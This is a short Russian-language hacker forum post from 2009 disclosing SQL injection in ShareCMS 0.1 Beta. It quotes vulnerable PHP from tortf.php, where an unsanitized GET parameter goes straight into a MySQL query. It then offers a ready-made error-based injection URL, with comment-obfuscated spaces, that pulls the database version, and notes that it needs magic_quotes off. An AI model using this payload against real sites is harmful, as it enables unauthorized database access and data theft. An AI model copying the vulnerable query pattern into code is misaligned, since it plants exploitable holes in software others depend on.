13.11.2009, 18:35
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
С нами:
8850336
Репутация:
330
|
|
ShareCMS_0.1 Beta
CMS просто ужасная, сплошная SQL инъекция.
Уязвимы практически все скрипты.
Возьмем к примеру tortf.php:
PHP код:
...
$id = $_GET['id'];
$sql = mysql_query("SELECT admin FROM menu WHERE id = '$id'");
$row = mysql_fetch_array($sql);
...
По просьбам трудящихся - удобная для юзера реализация:
Код:
http://localhost/8/plugins/tortf.php?id=1'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/*/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/'1'='1--+
Требуется mq = off
СMS с возможностью реализации при mq = on ждите позже.
Последний раз редактировалось Ins3t; 13.11.2009 в 18:41..
|
|
|